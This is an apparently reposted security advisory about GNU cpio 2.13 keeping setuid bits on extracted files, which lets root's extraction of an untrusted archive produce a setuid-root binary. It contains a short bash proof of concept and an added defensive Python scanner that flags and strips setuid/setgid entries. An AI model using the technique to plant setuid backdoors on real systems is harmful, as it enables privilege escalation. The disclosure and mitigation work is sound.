## https://sploitus.com/exploit?id=PACKETSTORM:176425
cpio privilege escalation vulnerability via setuid files in cpio archive  
  
Happy New Year, let in 2024 happiness be with you! :)  
  
When extracting an archive, cpio (at least version 2.13) preserves the setuid bit on the extracted
files. Since the extracted file belongs to the user running cpio, this can lead to privilege
escalation whenever root extracts an archive it does not trust: the result is a setuid-root binary.
  
One example: r00t extracts an archive to /tmp/, and scidiot then runs the setuid file
/tmp/micq/backd00r, without any further interaction from root.
  
We believe this is a vulnerability, since directory traversal in cpio
is considered a vulnerability.
  
The PoC is trivial; the bash script follows.
  
```bash
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski
# date: Mon Jan 8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13

# Create an empty file with the setuid bit set (mode 4555 = -r-sr-xr-x).
mkdir -p /tmp/1
cd /tmp/1
touch a
chmod 4555 a
# Pack it into an archive: -o create, -c newc (SVR4) header format,
# -v verbose, -0 read NUL-separated file names from stdin.
echo -n a | cpio -ocv0 > a.cpio

# Extract it elsewhere: cpio restores the stored mode, setuid bit included.
mkdir -p /tmp/2
cd /tmp/2
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a
#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a
```
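A pre-extraction check, added here as an example and not part of the advisory or of GNU cpio itself: a small parser for the newc (magic `070701`) format that `cpio -c` writes, which lists every entry whose stored mode carries setuid or setgid and can rewrite the archive with those bits cleared before it is fed to `cpio -i` as root. Function and variable names are mine; the embedded sample archive is constructed inline and mirrors the advisory's `a` (mode 4555) plus a few extra entries.

```python
"""Scan a cpio newc (070701) archive for setuid/setgid entries and optionally
strip those bits. Added example; not code from the advisory or from GNU cpio."""
import sys

NEWC_MAGIC = b"070701"
HEADER_LEN = 110            # 6-byte magic + 13 ASCII-hex fields of 8 chars each
S_ISUID, S_ISGID = 0o4000, 0o2000
TRAILER = "TRAILER!!!"      # name of the final pseudo-entry that ends the archive


def _pad4(n):
    return (4 - n % 4) % 4


def newc_entry(name, mode, data=b"", uid=0, gid=0, ino=1):
    """Build one newc entry: header, NUL-terminated name (header+name padded to 4),
    then file data (padded to 4). Used only to construct the sample archive."""
    name_b = name.encode() + b"\0"
    # ino mode uid gid nlink mtime filesize devmajor devminor rdevmajor rdevminor namesize check
    fields = [ino, mode, uid, gid, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
    body = NEWC_MAGIC + b"".join(b"%08x" % f for f in fields) + name_b
    body += b"\0" * _pad4(len(body))
    return body + data + b"\0" * _pad4(len(data))


def build_archive(entries):
    return b"".join(newc_entry(*e) for e in entries) + newc_entry(TRAILER, 0)


def walk_newc(blob):
    """Yield (header_offset, name, mode, data) for every entry before the trailer.
    Only the 070701 format is handled; odc/binary archives fail the magic check."""
    off = 0
    while True:
        hdr = blob[off:off + HEADER_LEN]
        if len(hdr) < HEADER_LEN:
            raise ValueError(f"truncated header at offset {off}")
        if hdr[:6] != NEWC_MAGIC:
            raise ValueError(f"bad magic {hdr[:6]!r} at offset {off}")
        f = [int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = f[1], f[6], f[11]
        name = blob[off + HEADER_LEN:off + HEADER_LEN + namesize - 1].decode("utf-8", "replace")
        data_off = off + HEADER_LEN + namesize
        data_off += _pad4(data_off - off)       # header+name is padded to a 4-byte boundary
        if name == TRAILER:
            return
        yield off, name, mode, blob[data_off:data_off + filesize]
        off = data_off + filesize + _pad4(filesize)


def special_bit_entries(blob):
    """(name, octal mode) of every entry cpio would extract with setuid and/or setgid set."""
    return [(name, oct(mode)) for _, name, mode, _ in walk_newc(blob)
            if mode & (S_ISUID | S_ISGID)]


def strip_special_bits(blob):
    """Copy of the archive with setuid/setgid cleared in every header. The mode field
    is header bytes 14..22; newc's check field is always 0, so nothing else changes."""
    out = bytearray(blob)
    for off, _, mode, _ in walk_newc(blob):
        out[off + 14:off + 22] = b"%08x" % (mode & ~(S_ISUID | S_ISGID))
    return bytes(out)


# Constructed sample (not a real archive from the advisory): the advisory's empty
# setuid 'a', a setuid-root style script, a setgid file and a harmless file.
SAMPLE = build_archive([
    ("a", 0o104555, b""),
    ("micq/backd00r", 0o104755, b"#!/bin/sh\nid\n"),
    ("g", 0o102755, b"x"),
    ("README", 0o100644, b"harmless\n"),
])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for name, mode in special_bit_entries(blob):
        print(f"WARNING: {name} would be extracted with mode {mode}")
```

Run it against the advisory's `/tmp/1/a.cpio` to see `a` flagged with mode `0o104555`; on a box with cpio installed the same information is visible as the `s` in the mode column of `cpio -itv < a.cpio`, which is the one-line manual check. Stripping the bits in the archive rather than after extraction closes the window in which the setuid file exists on disk.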